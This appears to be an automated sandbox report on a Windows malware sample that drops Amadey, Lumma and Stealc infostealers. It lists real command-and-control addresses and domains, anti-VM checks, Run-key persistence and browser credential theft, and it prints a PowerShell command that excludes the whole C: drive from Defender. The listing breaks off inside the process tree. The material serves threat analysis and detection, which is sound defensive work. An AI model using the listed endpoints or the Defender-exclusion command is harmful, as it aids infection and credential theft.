Analysis
-
max time kernel
180s -
max time network
181s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
28/03/2025, 18:26
Static task
static1
Behavioral task
behavioral1
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win7-20241010-en
Behavioral task
behavioral3
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral4
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral5
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
win11-20250313-en
Behavioral task
behavioral6
Sample
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Resource
macos-20241101-en
General
-
Target
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
-
Size
1.8MB
-
MD5
8480b3439f6f2fe71ff8136c8475a0e1
-
SHA1
8f787c424f7a1ac854d26b723008ea29d9f1b1aa
-
SHA256
37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8
-
SHA512
2b72c1f30549156dcf42aff32d2967580147a1cc499ca93f7a3e2b773e814bd9c368772d6ed02031c086b2c8376b405d30c7a43abff0729732232ad008e97958
-
SSDEEP
49152:fyPxPnQHIr7nIXvPvwrARGSLEUBLEffrLrr90+:6PxfQoTIXvPYlSLEWgXrLrr
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
https://twxayfarer.live/ALosnz
https://oreheatq.live/gsopp
https://castmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral4/memory/12260-26530-0x0000000000C80000-0x00000000010C8000-memory.dmp healer behavioral4/memory/12260-26529-0x0000000000C80000-0x00000000010C8000-memory.dmp healer behavioral4/memory/12260-27108-0x0000000000C80000-0x00000000010C8000-memory.dmp healer -
Healer family
-
Lumma family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2908 created 712 2908 MSBuild.exe 52 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b60fb80332.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
pid Process 12404 powershell.exe 6324 powershell.exe 5608 powershell.exe 884 powershell.exe 4516 powershell.exe 7808 powershell.exe 7624 powershell.exe 3208 powershell.exe 4372 powershell.exe 8432 powershell.exe 7908 PowerShell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 12 IoCs
flow pid Process 147 7952 futors.exe 23 2884 rapes.exe 23 2884 rapes.exe 17 2884 rapes.exe 50 3360 svchost.exe 122 2884 rapes.exe 19 3360 svchost.exe 46 2884 rapes.exe 65 2884 rapes.exe 65 2884 rapes.exe 138 7952 futors.exe 116 2884 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 10628 icacls.exe 10604 takeown.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 26 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 12860 chrome.exe 13016 chrome.exe 10500 msedge.exe 6616 chrome.exe 2844 chrome.exe 7240 chrome.exe 5428 chrome.exe 6164 chrome.exe 12872 chrome.exe 13268 chrome.exe 12084 msedge.exe 1108 chrome.exe 9656 msedge.exe 11600 msedge.exe 12740 msedge.exe 11080 msedge.exe 12036 chrome.exe 11112 chrome.exe 7660 chrome.exe 1104 chrome.exe 10244 chrome.exe 24900 chrome.exe 25592 msedge.exe 25848 msedge.exe 2608 msedge.exe 25856 msedge.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b60fb80332.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b60fb80332.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key value queried \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe -
Deletes itself 1 IoCs
pid Process 7348 w32tm.exe -
Executes dropped EXE 64 IoCs
pid Process 2884 rapes.exe 5944 u75a1_003.exe 3888 7IIl2eE.exe 3540 Passwords.com 5408 TbV75ZR.exe 1796 b60fb80332.exe 1944 tzutil.exe 5624 rapes.exe 6588 EPTwCQd.exe 7048 Rm3cVPI.exe 7192 xZRvIQ5.exe 7348 w32tm.exe 7788 amnew.exe 7952 futors.exe 8428 gron12321.exe 9100 bot.exe 9456 javaupdater_service.exe 9772 javaplatform_service.exe 9924 javaservice_service.exe 10028 javaplugin.exe 10156 javaplatformw.exe 10328 javaplatform_service.exe 3616 javaupdater_service.exe 10540 javaplatform_service.exe 10816 javaplatform.exe 11168 javaruntime_platform.exe 11292 javaupdaterw.exe 11380 javaplugin_platform.exe 11544 v7942.exe 11656 javaruntime_platform.exe 11800 javaupdater_update.exe 12008 javaplugin_service.exe 5464 javapluginw.exe 5108 javaservice_update.exe 12300 javaupdater_platform.exe 236 javaupdater_update.exe 1876 javasupport.exe 3096 javaservice.exe 4296 javaplatform_platform.exe 1196 javaplugin.exe 12648 javaruntime_update.exe 12776 javaupdater_platform.exe 6124 javaservice_update.exe 5568 javaplatform_service.exe 12912 javaupdater.exe 3084 javaupdater.exe 988 javaplugin_update.exe 1124 javaplatformw.exe 6272 javaservice_update.exe 5484 javaservice.exe 7800 javasupport_service.exe 2528 javaservicew.exe 8284 javaplugin_service.exe 8664 javaservice_platform.exe 8964 javaservice.exe 9132 javaupdater_service.exe 9224 javaplatform_platform.exe 9308 javaplatform_update.exe 2892 javaservice_update.exe 1152 javasupport.exe 12404 javaservice_update.exe 12216 javaservice_platform.exe 12072 javasupport.exe 11976 javaservice_service.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key opened \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine b60fb80332.exe Key opened \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Software\Wine rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 10604 takeown.exe 10628 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaupdater.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaupdater.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaupdaterw.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaupdaterw.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Platform SE javaupdater_service.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Oracle\\javaupdater_service.exe\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral4/files/0x0008000000028287-26110.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 34056 tasklist.exe 2000 tasklist.exe 3780 tasklist.exe 30352 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1312 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 2884 rapes.exe 1796 b60fb80332.exe 5624 rapes.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 5408 set thread context of 2908 5408 TbV75ZR.exe 114 PID 6588 set thread context of 6712 6588 EPTwCQd.exe 126 PID 7192 set thread context of 5112 7192 xZRvIQ5.exe 129 PID 8428 set thread context of 8604 8428 gron12321.exe 136 PID 11544 set thread context of 1916 11544 v7942.exe 157 -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 11680 sc.exe 11864 sc.exe 11928 sc.exe 12004 sc.exe 12112 sc.exe 10696 sc.exe 10868 sc.exe 11040 sc.exe 11416 sc.exe 11832 sc.exe 11960 sc.exe 12228 sc.exe 10404 sc.exe 10820 sc.exe 11184 sc.exe 11476 sc.exe 11528 sc.exe 12296 sc.exe 5520 sc.exe 10660 sc.exe 11092 sc.exe 11644 sc.exe 11772 sc.exe 10784 sc.exe 10972 sc.exe 11360 sc.exe 12196 sc.exe 10436 sc.exe 10572 sc.exe 10900 sc.exe 11224 sc.exe 11740 sc.exe 12044 sc.exe 12144 sc.exe 4956 sc.exe 10544 sc.exe 10984 sc.exe 2064 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 1188 2908 WerFault.exe 114 18836 6976 WerFault.exe 630 24908 12076 WerFault.exe 629 25104 18764 WerFault.exe 638 10008 25468 WerFault.exe 654 3888 11572 WerFault.exe 627 7512 11572 WerFault.exe 627 11000 26988 WerFault.exe 694 -
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b60fb80332.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u75a1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 21 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 7968 PING.EXE 7784 PING.EXE 10172 PING.EXE 8016 PING.EXE 8152 PING.EXE 7844 PING.EXE 9440 PING.EXE 11724 PING.EXE 6528 PING.EXE 12880 PING.EXE 8092 PING.EXE 8288 PING.EXE 8300 PING.EXE 6696 PING.EXE 6452 PING.EXE 7808 PING.EXE 9048 PING.EXE 10576 PING.EXE 11452 PING.EXE 11884 PING.EXE 9052 PING.EXE -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 10480 timeout.exe 25500 timeout.exe 15768 timeout.exe -
Kills process with taskkill 10 IoCs
pid Process 11528 taskkill.exe 8920 taskkill.exe 7256 taskkill.exe 6724 taskkill.exe 844 taskkill.exe 18660 taskkill.exe 25140 taskkill.exe 5540 taskkill.exe 4612 taskkill.exe 10296 taskkill.exe -
Modifies registry key 1 TTPs 9 IoCs
pid Process 7268 reg.exe 6312 reg.exe 11420 reg.exe 4100 reg.exe 9476 reg.exe 7644 reg.exe 9368 reg.exe 9980 reg.exe 10036 reg.exe -
Runs ping.exe 1 TTPs 21 IoCs
pid Process 10172 PING.EXE 10576 PING.EXE 9052 PING.EXE 6452 PING.EXE 8152 PING.EXE 7784 PING.EXE 8288 PING.EXE 8300 PING.EXE 9440 PING.EXE 11884 PING.EXE 7844 PING.EXE 7808 PING.EXE 9048 PING.EXE 11452 PING.EXE 6696 PING.EXE 7968 PING.EXE 11724 PING.EXE 6528 PING.EXE 12880 PING.EXE 8016 PING.EXE 8092 PING.EXE -
Suspicious behavior: EnumeratesProcesses 57 IoCs
pid Process 1312 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 1312 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 2884 rapes.exe 2884 rapes.exe 3208 powershell.exe 3208 powershell.exe 3540 Passwords.com 3540 Passwords.com 3540 Passwords.com 3540 Passwords.com 3540 Passwords.com 3540 Passwords.com 2908 MSBuild.exe 2908 MSBuild.exe 2908 MSBuild.exe 2908 MSBuild.exe 3560 svchost.exe 3560 svchost.exe 3560 svchost.exe 3560 svchost.exe 1796 b60fb80332.exe 1796 b60fb80332.exe 5624 rapes.exe 5624 rapes.exe 1796 b60fb80332.exe 1796 b60fb80332.exe 1796 b60fb80332.exe 1796 b60fb80332.exe 3540 Passwords.com 3540 Passwords.com 3540 Passwords.com 3540 Passwords.com 6712 MSBuild.exe 6712 MSBuild.exe 6712 MSBuild.exe 6712 MSBuild.exe 7048 Rm3cVPI.exe 7048 Rm3cVPI.exe 7048 Rm3cVPI.exe 7048 Rm3cVPI.exe 5112 MSBuild.exe 5112 MSBuild.exe 5112 MSBuild.exe 5112 MSBuild.exe 8604 MSBuild.exe 8604 MSBuild.exe 8604 MSBuild.exe 8604 MSBuild.exe 884 powershell.exe 884 powershell.exe 4516 powershell.exe 4516 powershell.exe 1916 MSBuild.exe 1916 MSBuild.exe 7808 powershell.exe 7808 powershell.exe 7808 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5944 u75a1_003.exe 5944 u75a1_003.exe 5944 u75a1_003.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 3208 powershell.exe Token: SeIncreaseQuotaPrivilege 3208 powershell.exe Token: SeSecurityPrivilege 3208 powershell.exe Token: SeTakeOwnershipPrivilege 3208 powershell.exe Token: SeLoadDriverPrivilege 3208 powershell.exe Token: SeSystemProfilePrivilege 3208 powershell.exe Token: SeSystemtimePrivilege 3208 powershell.exe Token: SeProfSingleProcessPrivilege 3208 powershell.exe Token: SeIncBasePriorityPrivilege 3208 powershell.exe Token: SeCreatePagefilePrivilege 3208 powershell.exe Token: SeBackupPrivilege 3208 powershell.exe Token: SeRestorePrivilege 3208 powershell.exe Token: SeShutdownPrivilege 3208 powershell.exe Token: SeDebugPrivilege 3208 powershell.exe Token: SeSystemEnvironmentPrivilege 3208 powershell.exe Token: SeRemoteShutdownPrivilege 3208 powershell.exe Token: SeUndockPrivilege 3208 powershell.exe Token: SeManageVolumePrivilege 3208 powershell.exe Token: 33 3208 powershell.exe Token: 34 3208 powershell.exe Token: 35 3208 powershell.exe Token: 36 3208 powershell.exe Token: SeDebugPrivilege 2000 tasklist.exe Token: SeDebugPrivilege 3780 tasklist.exe Token: SeDebugPrivilege 884 powershell.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeDebugPrivilege 7808 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1312 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 3540 Passwords.com 3540 Passwords.com 3540 Passwords.com 7788 amnew.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3540 Passwords.com 3540 Passwords.com 3540 Passwords.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1312 wrote to memory of 2884 1312 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 81 PID 1312 wrote to memory of 2884 1312 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 81 PID 1312 wrote to memory of 2884 1312 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 81 PID 2884 wrote to memory of 5944 2884 rapes.exe 87 PID 2884 wrote to memory of 5944 2884 rapes.exe 87 PID 2884 wrote to memory of 5944 2884 rapes.exe 87 PID 5944 wrote to memory of 812 5944 u75a1_003.exe 88 PID 5944 wrote to memory of 812 5944 u75a1_003.exe 88 PID 5944 wrote to memory of 3360 5944 u75a1_003.exe 90 PID 5944 wrote to memory of 3360 5944 u75a1_003.exe 90 PID 812 wrote to memory of 3208 812 cmd.exe 91 PID 812 wrote to memory of 3208 812 cmd.exe 91 PID 2884 wrote to memory of 3888 2884 rapes.exe 99 PID 2884 wrote to memory of 3888 2884 rapes.exe 99 PID 2884 wrote to memory of 3888 2884 rapes.exe 99 PID 3888 wrote to memory of 3852 3888 7IIl2eE.exe 100 PID 3888 wrote to memory of 3852 3888 7IIl2eE.exe 100 PID 3888 wrote to memory of 3852 3888 7IIl2eE.exe 100 PID 3852 wrote to memory of 2000 3852 CMD.exe 102 PID 3852 wrote to memory of 2000 3852 CMD.exe 102 PID 3852 wrote to memory of 2000 3852 CMD.exe 102 PID 3852 wrote to memory of 1912 3852 CMD.exe 103 PID 3852 wrote to memory of 1912 3852 CMD.exe 103 PID 3852 wrote to memory of 1912 3852 CMD.exe 103 PID 3852 wrote to memory of 3780 3852 CMD.exe 104 PID 3852 wrote to memory of 3780 3852 CMD.exe 104 PID 3852 wrote to memory of 3780 3852 CMD.exe 104 PID 3852 wrote to memory of 1324 3852 CMD.exe 105 PID 3852 wrote to memory of 1324 3852 CMD.exe 105 PID 3852 wrote to memory of 1324 3852 CMD.exe 105 PID 3852 wrote to memory of 2112 3852 CMD.exe 106 PID 3852 wrote to memory of 2112 3852 CMD.exe 106 PID 3852 wrote to memory of 2112 3852 CMD.exe 106 PID 3852 wrote to memory of 2208 3852 CMD.exe 107 PID 3852 wrote to memory of 2208 3852 CMD.exe 107 PID 3852 wrote to memory of 2208 3852 CMD.exe 107 PID 3852 wrote to memory of 884 3852 CMD.exe 108 PID 3852 wrote to memory of 884 3852 CMD.exe 108 PID 3852 wrote to memory of 884 3852 CMD.exe 108 PID 3852 wrote to memory of 5152 3852 CMD.exe 109 PID 3852 wrote to memory of 5152 3852 CMD.exe 109 PID 3852 wrote to memory of 5152 3852 CMD.exe 109 PID 3852 wrote to memory of 4828 3852 CMD.exe 110 PID 3852 wrote to memory of 4828 3852 CMD.exe 110 PID 3852 wrote to memory of 4828 3852 CMD.exe 110 PID 3852 wrote to memory of 3540 3852 CMD.exe 111 PID 3852 wrote to memory of 3540 3852 CMD.exe 111 PID 3852 wrote to memory of 3540 3852 CMD.exe 111 PID 3852 wrote to memory of 1800 3852 CMD.exe 112 PID 3852 wrote to memory of 1800 3852 CMD.exe 112 PID 3852 wrote to memory of 1800 3852 CMD.exe 112 PID 2884 wrote to memory of 5408 2884 rapes.exe 113 PID 2884 wrote to memory of 5408 2884 rapes.exe 113 PID 5408 wrote to memory of 2908 5408 TbV75ZR.exe 114 PID 5408 wrote to memory of 2908 5408 TbV75ZR.exe 114 PID 5408 wrote to memory of 2908 5408 TbV75ZR.exe 114 PID 5408 wrote to memory of 2908 5408 TbV75ZR.exe 114 PID 5408 wrote to memory of 2908 5408 TbV75ZR.exe 114 PID 5408 wrote to memory of 2908 5408 TbV75ZR.exe 114 PID 5408 wrote to memory of 2908 5408 TbV75ZR.exe 114 PID 5408 wrote to memory of 2908 5408 TbV75ZR.exe 114 PID 5408 wrote to memory of 2908 5408 TbV75ZR.exe 114 PID 5408 wrote to memory of 2908 5408 TbV75ZR.exe 114 PID 2908 wrote to memory of 3560 2908 MSBuild.exe 115 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:712
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3560
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵PID:22084
-
-
C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe"C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\10337510101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10337510101\u75a1_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5944 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3208
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:3360 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵
- Executes dropped EXE
PID:1944
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵
- Deletes itself
- Executes dropped EXE
PID:7348 -
